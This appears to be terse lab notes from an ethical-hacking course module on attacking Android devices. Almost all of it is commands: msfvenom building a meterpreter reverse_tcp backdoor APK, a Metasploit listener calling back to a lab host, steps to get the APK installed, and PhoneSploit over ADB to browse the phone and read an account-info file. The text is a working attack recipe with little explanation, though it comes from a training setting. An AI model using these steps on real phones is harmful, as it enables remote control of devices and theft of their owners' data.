17 - Hacking Mobile
Module 17 - Hacking Mobile Platforms
Download a file from Android device
ADB Tool
PhoneSploit
Check entropy and hash of elf file using ADB Tool
Generating and Executing Payloads for Android
Setup Android
Open terminal, run
su
Run
ip addr add 10.10.10.69/24 dev eth0
Generate Payload
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk
R rawHost the payload and run a listener on Kali
Type
use exploit/multi/handler
Type
set payload android/meterpreter/reverse_tcp
Type
set LHOST 10.10.10.11
Start listener, type
exploit -j -z
Browse link of file to start meterpreter session.
Exploit Execution
Open kali hosted link.
Download APK using es file downloader.
Install and run.
Exploit the Android Platform through ADB using PhoneSploit
cd Phonesploit
python3 -m pip install colorama
python3 phonesploit.py
3
10.10.10.14
4
pwd
cd sdcard
cd Download
pwd
cd sdcard
cd downloads
cat accnt-info.txt
Last updated